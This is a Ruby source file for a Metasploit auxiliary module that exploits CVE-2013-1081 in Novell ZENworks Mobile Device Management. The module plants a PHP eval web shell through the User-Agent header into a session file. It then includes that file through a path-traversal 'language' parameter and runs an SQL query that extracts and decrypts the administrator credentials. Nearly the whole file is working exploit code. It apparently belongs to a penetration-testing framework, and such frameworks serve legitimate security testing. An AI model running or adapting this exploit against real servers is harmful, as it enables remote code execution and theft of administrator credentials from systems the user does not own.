/modules/auxiliary/scanner/http/novell_mdm_creds.rb
Ruby | 120 lines | 99 code | 17 blank | 4 comment | 6 complexity | acc3f3655905480a71f995098ed9fee3 MD5 | raw file
Possible License(s): BSD-3-Clause, Apache-2.0, GPL-3.0, LGPL-2.1, GPL-2.0
- ##
- # This module requires Metasploit: http//metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- require 'msf/core'
- class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::HttpClient
- include Msf::Auxiliary::Report
- include Msf::Auxiliary::Scanner
- def initialize
- super(
- 'Name' => 'Novell Zenworks Mobile Device Managment Admin Credentials',
- 'Description' => %q{
- This module attempts to pull the administrator credentials from
- a vulnerable Novell Zenworks MDM server.
- },
- 'Author' =>
- [
- 'steponequit',
- 'Andrea Micalizzi (aka rgod)' #zdireport
- ],
- 'References' =>
- [
- ['CVE', '2013-1081'],
- ['OSVDB', '91119'],
- ['URL', 'http://www.novell.com/support/kb/doc.php?id=7011895']
- ],
- 'License' => MSF_LICENSE
- )
- register_options([
- OptString.new('TARGETURI', [true, 'Path to the Novell Zenworks MDM install', '/'])
- ], self.class)
- register_advanced_options([
- OptBool.new('SSL', [true, "Negotiate SSL connection", false])
- ], self.class)
- end
- def setup_session()
- sess = Rex::Text.rand_text_alpha(8)
- cmd = Rex::Text.rand_text_alpha(8)
- res = send_request_cgi({
- 'agent' => "<?php echo(eval($_GET['#{cmd}'])); ?>",
- 'method' => "HEAD",
- 'uri' => normalize_uri("#{target_uri.path}", "download.php"),
- 'headers' => {"Cookie" => "PHPSESSID=#{sess}"},
- })
- return sess,cmd
- end
- def get_creds(session_id,cmd_var)
- cmd = '$pass=mdm_ExecuteSQLQuery('
- cmd << '"SELECT UserName,Password FROM Administrators where AdministratorSAKey = 1"'
- cmd << ',array(),false,-1,"","","",QUERY_TYPE_SELECT);'
- cmd << 'echo "".$pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"])."";'
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => normalize_uri("#{target_uri.path}", "DUSAP.php"),
- 'vars_get' => {
- 'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
- cmd_var => cmd
- }
- })
- if res.nil?
- print_error("Connection timed out")
- return "", "" # Empty username & password
- end
- creds = res.body.to_s.match(/.*:"(.*)";.*";/)[1]
- return creds.split(":")
- end
- def run_host(ip)
- print_status("Verifying that Zenworks login page exists at #{ip}")
- uri = normalize_uri(target_uri.path)
- begin
- res = send_request_raw({
- 'method' => 'GET',
- 'uri' => uri
- })
- if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
- print_status("Found Zenworks MDM, Checking application version")
- ver = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]
- print_status("Found Version #{ver}")
- session_id,cmd = setup_session()
- user,pass = get_creds(session_id,cmd)
- return if user.empty? and pass.empty?
- print_good("Got creds. Login:#{user} Password:#{pass}")
- print_good("Access the admin interface here: #{ip}:#{rport}#{target_uri.path}dashboard/")
- report_auth_info(
- :host => ip,
- :port => rport,
- :sname => "novellmdm",
- :user => user,
- :pass => pass,
- :active => true
- )
- else
- print_error("Zenworks MDM does not appear to be running at #{ip}")
- return :abort
- end
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- rescue ::Timeout::Error, ::Errno::EPIPE
- rescue ::OpenSSL::SSL::SSLError => e
- return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted
- end
- end
- end